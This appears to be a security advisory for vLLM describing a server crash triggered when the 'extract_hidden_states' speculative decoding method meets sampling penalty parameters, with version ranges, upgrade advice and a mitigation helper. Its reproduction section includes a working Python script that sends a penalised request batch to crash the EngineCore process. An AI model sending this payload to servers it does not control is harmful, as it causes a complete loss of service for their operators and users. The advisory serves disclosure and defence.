vLLM
cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*
- >= 0.18.0, <= 0.19.1
A vulnerability in vLLM, an inference engine for large language models, crashes the server when the 'extract_hidden_states' speculative decoding method is used together with sampling penalty parameters. It affects vLLM versions from 0.18.0 up to, but not including, 0.20.0. The crash occurs because the 'extract_hidden_states' proposer returns a tensor with an incorrect shape after the first decoding step, which leads to a shape mismatch error. The failure is immediate and consistent whenever any request in a batch includes a sampling penalty, such as 'repetition_penalty', 'frequency_penalty', or 'presence_penalty'.
Exploiting this vulnerability causes the EngineCore process to crash, leading to a complete loss of service availability.
To reproduce this vulnerability, send a batch request to a vLLM server running a vulnerable version with the 'extract_hidden_states' speculative decoding method enabled. Ensure that at least one request in the batch includes a sampling penalty parameter, such as 'repetition_penalty'. The server will crash immediately after processing the request with the penalty parameter.
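The reproduction steps above can be sketched as a small script for checking a deployment you control. This is a minimal sketch, not an official test case: it assumes the server exposes the OpenAI-compatible '/v1/completions' endpoint at http://localhost:8000, that 'my-model' is replaced by the served model name, and that the server was already started with the 'extract_hidden_states' speculative decoding method (the startup configuration is not shown here). The helper names 'build_batch', 'send', and 'reproduce' are hypothetical.

```python
import json
import urllib.request
from concurrent.futures import ThreadPoolExecutor

BASE_URL = "http://localhost:8000"  # assumption: local test server
MODEL = "my-model"                  # placeholder: use the served model name


def build_batch(n=4):
    """Build n completion payloads; only the last one carries a penalty."""
    batch = [
        {"model": MODEL, "prompt": f"Request {i}: say hello.", "max_tokens": 32}
        for i in range(n)
    ]
    # A single penalised request in the batch is the reported trigger.
    batch[-1]["repetition_penalty"] = 1.2
    return batch


def send(payload):
    """POST one payload; return the HTTP status or a failure description."""
    req = urllib.request.Request(
        f"{BASE_URL}/v1/completions",
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return resp.status
    except OSError as exc:  # covers URLError, HTTPError, timeouts, resets
        return f"failed: {exc}"


def reproduce():
    """Send all payloads concurrently so the server can batch them."""
    batch = build_batch()
    with ThreadPoolExecutor(max_workers=len(batch)) as pool:
        return list(pool.map(send, batch))
```

Calling 'reproduce()' against an affected server is expected to end with failed requests once the EngineCore process goes down. Requests are sent concurrently because the server forms batches from requests that arrive together, so a single sequential client may not place penalised and unpenalised requests in the same batch.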
Upgrade to vLLM version 0.20.0 or later. If an upgrade is not possible, avoid using the 'extract_hidden_states' method with penalty parameters on affected versions.
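Where an upgrade has to wait, the workaround above could be enforced in a proxy or gateway in front of the server. The following is a minimal sketch under stated assumptions: the helper names 'parse_version', 'is_affected', and 'strip_penalties' are hypothetical, the version check looks only at the first three numeric components of the version string, and removing the penalty fields changes sampling behaviour for the affected requests, so it is a stopgap rather than a fix.

```python
import re

PENALTY_KEYS = ("repetition_penalty", "frequency_penalty", "presence_penalty")


def parse_version(version):
    """Return the first three numeric components as a tuple of ints."""
    nums = [int(n) for n in re.findall(r"\d+", version)[:3]]
    nums += [0] * (3 - len(nums))  # pad short versions such as "0.19"
    return tuple(nums)


def is_affected(version):
    """True for versions from 0.18.0 up to, but not including, 0.20.0."""
    return (0, 18, 0) <= parse_version(version) < (0, 20, 0)


def strip_penalties(payload):
    """Return a copy of the payload without penalty fields, plus what was removed."""
    cleaned = {k: v for k, v in payload.items() if k not in PENALTY_KEYS}
    removed = [k for k in PENALTY_KEYS if k in payload]
    return cleaned, removed
```

A gateway could call 'is_affected' once at startup with the deployed version and, if it returns True, pass each incoming request body through 'strip_penalties' before forwarding it. Rejecting such requests with an error instead of silently rewriting them is an equally reasonable design choice when clients depend on the penalties.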